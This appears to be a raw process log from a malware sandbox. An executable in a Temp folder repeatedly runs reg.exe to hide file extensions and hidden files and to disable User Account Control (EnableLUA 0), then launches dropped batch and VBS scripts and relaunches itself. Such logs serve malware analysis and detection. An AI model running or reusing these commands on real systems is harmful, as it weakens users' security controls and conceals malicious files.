C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IGkMIMUE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oOQQEwII.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KKgkUMMs.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jeEAMYIU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BCcYQUok.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JKMoogos.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VMscUgcQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nuAMcgQs.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sEsUkUYU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ySAIcMcY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GeMIowQc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qYQcwAYU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\puUIogsI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pOEIIEgQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XQkcEAkA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dOQQoYgw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZcQYAcoY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YEwMEYco.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aKAQUwws.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yOEkkUoA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

